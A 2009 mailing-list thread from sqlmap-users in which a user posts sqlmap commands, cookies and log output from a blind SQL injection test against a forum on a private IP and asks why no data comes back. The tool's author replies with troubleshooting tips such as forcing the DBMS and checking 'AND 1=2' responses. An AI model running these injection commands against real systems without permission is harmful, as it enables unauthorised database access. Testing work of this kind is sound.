Re: [sqlmap-users] Blind injection possible - no output
Brought to you by:
inquisb
From: Erik N. <da...@gm...> - 2009-09-17 17:34:39
|
Thank you for your answer, unfortunately it didn't help me. I tried to force the back-end dbms into a number of different variations. I also double checked that the string isn't present when using AND 1=2. Using --fingerprint gave me no output as well. This is what I got from that run: [19:28:54] [WARNING] the testable parameter 'id' you provided is not into the Cookie [19:28:54] [INFO] testing connection to the target url [19:28:58] [INFO] testing if the provided string is within the target URL page content [19:28:59] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis [19:28:59] [INFO] testing unescaped numeric injection on GET parameter 'id' [19:29:03] [INFO] confirming unescaped numeric injection on GET parameter 'id' [19:29:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis [19:29:04] [INFO] testing for parenthesis on injectable parameter [19:29:07] [INFO] the injectable parameter requires 0 parenthesis [19:29:07] [INFO] the back-end DBMS is MySQL [19:29:07] [INFO] testing MySQL [19:29:13] [INFO] confirming MySQL [19:29:17] [INFO] retrieved: [19:29:25] [INFO] the back-end DBMS is MySQL [19:29:25] [INFO] retrieved: [19:29:34] [INFO] retrieved: [19:29:43] [INFO] retrieved: [19:29:49] [INFO] retrieved: [19:29:59] [INFO] retrieved: [19:30:06] [INFO] executing MySQL comment injection fingerprint web server operating system: Linux Ubuntu web application technology: PHP 5.2.6, Apache back-end DBMS: active fingerprint: MySQL < 3.22.11 comment injection fingerprint: MySQL 5.0.75 [*] shutting down at: 19:32:09 On Thu, Sep 17, 2009 at 6:52 PM, Bernardo Damele A. G. <ber...@gm...> wrote: > Hi Erik, > > Try to force the back-end database software and version manually if > you know it, e.g. --dbms "mysql 5" and double check that the provided > string to match on is not present within any False response (eg. AND > 1=2). > > Cheers, > Bernardo > > > On Tue, Sep 8, 2009 at 13:21, Erik Nilsson <da...@gm...> wrote: >> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; >> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); >> __utmb=107765125.29.10.1252406202; __utmc=107765125; >> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" >> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id >> --string="Secret Forum" --fingerprint >> >> [14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable >> with 0 parenthesis >> [14:09:04] [INFO] testing for parenthesis on injectable parameter >> [14:09:06] [INFO] the injectable parameter requires 0 parenthesis >> [14:09:06] [INFO] testing MySQL >> [14:09:07] [INFO] confirming MySQL >> [14:09:08] [INFO] retrieved: >> [14:09:10] [INFO] the back-end DBMS is MySQL >> [14:09:10] [INFO] retrieved: >> [14:11:28] [INFO] retrieved: >> [14:11:32] [INFO] retrieved: >> [14:11:35] [INFO] retrieved: >> [14:11:41] [INFO] retrieved: >> [14:11:46] [INFO] executing MySQL comment injection fingerprint >> web server operating system: Linux Ubuntu >> web application technology: PHP 5.2.6, Apache >> back-end DBMS: active fingerprint: MySQL < 3.22.11 >> comment injection fingerprint: MySQL 5.0.75 >> >> >> [*] shutting down at: 14:12:50 >> >> >> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; >> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); >> __utmb=107765125.29.10.1252406202; __utmc=107765125; >> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" >> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id >> --string="Secret Forum" --current-db >> >> [14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare >> nthesis >> [14:14:01] [INFO] testing for parenthesis on injectable parameter >> [14:14:03] [INFO] the injectable parameter requires 0 parenthesis >> [14:14:03] [INFO] testing MySQL >> [14:14:04] [INFO] confirming MySQL >> [14:14:05] [INFO] retrieved: >> [14:14:07] [INFO] the back-end DBMS is MySQL >> web server operating system: Linux Ubuntu >> web application technology: PHP 5.2.6, Apache >> back-end DBMS: MySQL < 5.0.0 >> >> [14:14:07] [INFO] fetching current database >> [14:14:07] [INFO] retrieved: >> current database: None >> >> >> What to do? >> >> ------------------------------------------------------------------------------ >> Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day >> trial. Simplify your report design, integration and deployment - and focus on >> what you do best, core application coding. Discover what's new with >> Crystal Reports now. http://p.sf.net/sfu/bobj-july >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: 0x05F5A30F > |